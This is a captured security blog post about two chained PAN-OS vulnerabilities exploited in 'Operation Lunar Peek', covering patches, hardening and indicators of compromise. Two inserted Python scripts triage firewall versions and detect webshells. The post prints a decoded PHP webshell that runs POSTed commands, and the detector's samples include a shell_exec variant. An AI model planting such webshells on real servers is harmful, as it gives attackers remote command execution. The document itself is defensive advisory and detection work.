cyble.com Open in urlscan Pro
192.0.78.231  Public Scan

URL: https://cyble.com/blog/german-cert-warns-attacks-are-happening/
Submission: On November 29 via api from IN — Scanned from DE


 * Vulnerability

 * November 21, 2024


GERMAN CERT WARNS ‘ATTACKS ARE HAPPENING,’ URGES PAN-OS CHAINED VULNERABILITIES’
PATCHING

Scans show hundreds of Palo Alto management interfaces exposed to the internet,
carrying vulnerable versions of PAN-OS software.


OVERVIEW



Germany's CERT-Bund has raised the alarm over the exploitation of two chained
PAN-OS vulnerabilities, urging users to patch urgently as hundreds of vulnerable
instances remain exposed in Germany and around the globe.



CERT-Bund warned in a notification on X earlier this week: “Attacks are already
taking place. Customers should immediately secure their firewalls.” This warning
was for two critical vulnerabilities, CVE-2024-0012 and CVE-2024-9474, in Palo
Alto Networks’ PAN-OS.

Palo Alto Networks confirmed that these bugs have been actively exploited in a
limited set of attacks, which it tracks as “Operation Lunar Peek.” These
vulnerabilities allow attackers to gain unauthorized administrative privileges
and execute arbitrary commands, posing a significant risk to organizations using
affected devices.

While fixes have been released, the urgency of patching, monitoring, and
securing firewall management interfaces has never been higher. This blog
provides a detailed breakdown of the vulnerabilities, exploitation patterns, and
actionable remediation strategies to safeguard against this ongoing threat.

UNDERSTANDING THE VULNERABILITIES




CVE-2024-0012: AUTHENTICATION BYPASS VULNERABILITY

 * Severity: Critical
 * Impact: Allows unauthenticated attackers with network access to the
   management web interface to:
   * Gain PAN-OS administrator privileges.
   * Tamper with configurations.
   * Exploit other privilege escalation vulnerabilities, such as CVE-2024-9474.
 * Affected Products:
   PAN-OS 10.2, 11.0, 11.1, and 11.2 software on PA-Series, VM-Series, CN-Series
   firewalls, Panorama appliances, and WildFire.
   Note: Cloud NGFW and Prisma Access are not affected.
 * Root Cause: Missing authentication checks for critical functions within the
   PAN-OS management web interface.


CVE-2024-9474: PRIVILEGE ESCALATION VULNERABILITY



 * Severity: Critical
 * Impact: Allows authenticated PAN-OS administrators to escalate privileges and
   execute arbitrary commands with root access.
 * Affected Products: Same as CVE-2024-0012, with additional fixes available for
   PAN-OS 10.1.

These vulnerabilities are particularly dangerous when chained together, enabling
unauthenticated remote command execution on vulnerable devices. Palo Alto said
that it assesses with moderate to high confidence that a functional exploit
chaining CVE-2024-0012 and CVE-2024-9474 is publicly available.


OBSERVED EXPLOITATION IN OPERATION LUNAR PEEK



Palo Alto Networks’ Unit 42 team is actively tracking exploitation activities
tied to these vulnerabilities. Key observations include:

 * Initial Access: Exploitation has primarily targeted PAN-OS management web
   interfaces exposed to the internet. Many attacks originated from IP addresses
   associated with anonymous VPN services or proxies.
 * Post-Exploitation Activity:
   * Interactive command execution.
   * Deployment of webshells, such as a payload recovered with SHA256:
     3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668.
   * Potential lateral movement and further compromise of network assets.
 * Scanning Activity: Increased manual and automated scans, likely probing for
   vulnerable interfaces. A report by Censys found 13,324 publicly exposed
   management interfaces globally, with 34% located in the United States. More
   than 200 were located in Germany. German CERT has also confirmed active
   exploitation, urging organizations to “immediately secure their firewalls.”


REMEDIATION AND MITIGATION




PATCHING

Palo Alto Networks has released patches addressing both vulnerabilities.
Organizations must upgrade to the following versions immediately:

 * PAN-OS 10.2: 10.2.12-h2 or later.
 * PAN-OS 11.0: 11.0.6-h1 or later.
 * PAN-OS 11.1: 11.1.5-h1 or later.
 * PAN-OS 11.2: 11.2.4-h1 or later.
 * PAN-OS 10.1: 10.1.14-h6 (for CVE-2024-9474).
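To apply the version list above across a device inventory, here is an added example (not code from the post or from Palo Alto Networks) that parses PAN-OS version strings, including the -hN hotfix suffix, and classifies each device against the fixed releases listed. The inventory lines and hostnames are constructed sample data.

```python
"""Classify PAN-OS versions against the fixed releases for CVE-2024-0012 / CVE-2024-9474.

Added example, not from the Cyble post or Palo Alto Networks. The fixed
versions are the ones listed in the post; the inventory is constructed.
"""
import re
from typing import Dict, Iterable, Tuple

# Minimum fixed release per major train, as listed in the post. PAN-OS 10.1
# is only affected by CVE-2024-9474, so its fix covers that CVE alone.
FIXED_VERSIONS = {
    "10.2": "10.2.12-h2",
    "11.0": "11.0.6-h1",
    "11.1": "11.1.5-h1",
    "11.2": "11.2.4-h1",
    "10.1": "10.1.14-h6",
}

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse_version(version: str) -> Tuple[int, int, int, int]:
    """Parse 'major.minor.maint[-hN]' into a comparable tuple.

    A release without a hotfix suffix sorts below the same release with one
    (10.2.12 < 10.2.12-h2), which is exactly the comparison needed here.
    """
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version: {version!r}")
    major, minor, maint, hotfix = m.groups()
    return (int(major), int(minor), int(maint), int(hotfix or 0))


def assess(version: str) -> str:
    """Return 'patched', 'vulnerable' or 'unknown-train' for one device version."""
    parsed = parse_version(version)
    train = f"{parsed[0]}.{parsed[1]}"
    fixed = FIXED_VERSIONS.get(train)
    if fixed is None:
        # Trains not in the table (for example 9.x) must be checked against
        # the vendor advisory by hand rather than guessed at here.
        return "unknown-train"
    return "patched" if parsed >= parse_version(fixed) else "vulnerable"


def triage_inventory(lines: Iterable[str]) -> Dict[str, str]:
    """Parse 'hostname,version' lines and return {hostname: status}."""
    result: Dict[str, str] = {}
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        host, version = (part.strip() for part in line.split(",", 1))
        result[host] = assess(version)
    return result


# Constructed sample inventory (not real devices).
SAMPLE_INVENTORY = """\
# hostname,pan-os-version
fw-edge-01,10.2.12-h2
fw-edge-02,10.2.12
fw-dc-01,11.1.4-h7
fw-dc-02,11.1.5-h1
fw-lab-01,10.1.14-h6
fw-old-01,9.1.17
""".splitlines()

if __name__ == "__main__":
    for host, status in triage_inventory(SAMPLE_INVENTORY).items():
        print(f"{host:12} {status}")
```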


SECURING MANAGEMENT INTERFACES



Palo Alto Networks strongly recommends the following:

 1. Restrict Interface Access: Allow only trusted internal IP addresses or
    designated jump boxes to access the management interface.
 2. Disable Public Access: Block internet-facing access to the management
    interface via network-level controls.
 3. Enable Two-Factor Authentication (2FA): Add an extra layer of security for
    administrator access.


MONITORING AND DETECTION



 * Deploy detection rules for webshells and other malicious artifacts. The
   following decoded PHP webshell sample was observed during Operation Lunar
   Peek:

<?php $z="system";            // alias the system() function under a short name
if(${"_POST"}["b"]=="iUqPd")   // gate on a fixed "password" in POST parameter b
{
    $z(${"_POST"}["x"]);       // run the command supplied in POST parameter x
};

 * Watch for abnormal activities such as:
   * Unrecognized configuration changes.
   * New or suspicious administrator accounts.
   * Command execution logs indicating unauthorized access.
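As an added example of a detection rule for the webshell traits quoted above (this is not code from the post or from Unit 42), the following scanner flags PHP source in which a dangerous function name is stored in a variable, that variable is invoked as a function, and request input reaches the call, including the ${"_POST"} spelling used in the observed sample. The three sample files are constructed for this example.

```python
"""Flag the variable-function webshell pattern seen in Operation Lunar Peek.

Added example, not code from the Cyble post or from Unit 42. Plain regex
checks over PHP source; the samples at the bottom are constructed.
"""
import re
from typing import List

# PHP functions that run shell commands or evaluate code.
DANGEROUS_FUNCS = {
    "system", "exec", "shell_exec", "passthru", "popen", "proc_open",
    "eval", "assert",
}

# $z = "system";   (string literal assigned to a variable)
_ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*["\'](\w+)["\']\s*;')
# $z(            (variable name used as the callee)
_VARCALL_RE = re.compile(r'\$(\w+)\s*\(')
# $_POST[ / $_GET[ / ... and the obfuscated ${"_POST"}[ form
_SUPERGLOBAL_RE = re.compile(
    r'(?:\$\{\s*["\'](_POST|_GET|_REQUEST|_COOKIE)["\']\s*\}'
    r'|\$(_POST|_GET|_REQUEST|_COOKIE))\s*\['
)
_OBFUSCATED_RE = re.compile(r'\$\{\s*["\']_(?:POST|GET|REQUEST|COOKIE)["\']\s*\}')


def scan_php(source: str) -> List[str]:
    """Return human-readable findings for one PHP source string (empty = clean)."""
    findings: List[str] = []
    assigned = dict(_ASSIGN_RE.findall(source))          # var -> literal
    aliased = {v for v, lit in assigned.items() if lit in DANGEROUS_FUNCS}
    called = set(_VARCALL_RE.findall(source))
    for var in sorted(aliased):
        findings.append(f"dangerous function '{assigned[var]}' stored in ${var}")
    for var in sorted(aliased & called):
        findings.append(f"${var} invoked as a variable function")
    sources = {a or b for a, b in _SUPERGLOBAL_RE.findall(source)}
    if sources and (aliased & called):
        findings.append("request input (" + ", ".join(sorted(sources))
                        + ") reaches a variable-function call")
    if _OBFUSCATED_RE.search(source):
        findings.append('superglobal accessed via the obfuscated ${"_..."} form')
    return findings


def is_suspicious(source: str) -> bool:
    """True when at least one webshell trait was found."""
    return bool(scan_php(source))


# Constructed samples. The first mirrors the shell quoted in the post (with
# straight quotes); the others are a benign file and a plausible variant.
LUNAR_PEEK_SAMPLE = '''<?php $z="system";
if(${"_POST"}["b"]=="iUqPd")
{
    $z(${"_POST"}["x"]);
};
'''
BENIGN_SAMPLE = '''<?php
$name = "world";
echo "Hello, " . htmlspecialchars($_GET["name"] ?? $name);
'''
VARIANT_SAMPLE = '''<?php $f='shell_exec'; echo $f($_REQUEST['cmd']);'''

if __name__ == "__main__":
    for label, src in [("lunar-peek", LUNAR_PEEK_SAMPLE),
                       ("benign", BENIGN_SAMPLE),
                       ("variant", VARIANT_SAMPLE)]:
        print(label, "->", scan_php(src) or ["clean"])
```

Run it over files exported from a support bundle or forensic image rather than on the appliance itself; a SHA256 match against the hash listed in the post is the exact-match complement to this pattern check.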


ENHANCED FACTORY RESET (EFR)

Organizations detecting evidence of compromise should:

 1. Take affected devices offline immediately.
 2. Perform an Enhanced Factory Reset (EFR) in collaboration with Palo Alto
    Networks support.
 3. Reconfigure the device with updated firmware and secure management policies.


INDICATORS OF COMPROMISE (IOCS)




IP ADDRESSES OBSERVED IN SCANS AND EXPLOITS

 * Scanning Sources:
   * 41.215.28[.]241
   * 45.32.110[.]123
   * 103.112.106[.]17
   * 104.28.240[.]123
   * 182.78.17[.]137
   * 216.73.160[.]186

 * Threat Actor Proxies:


MALICIOUS ARTIFACTS



 * Webshell payload hash (PHP webshell payload dropped on a compromised firewall
   – SHA256): 3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668.


REFERENCES:



https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2024/2024-291133-1032

https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2024/2024-291133-1032.pdf?__blob=publicationFile&v=5

https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474

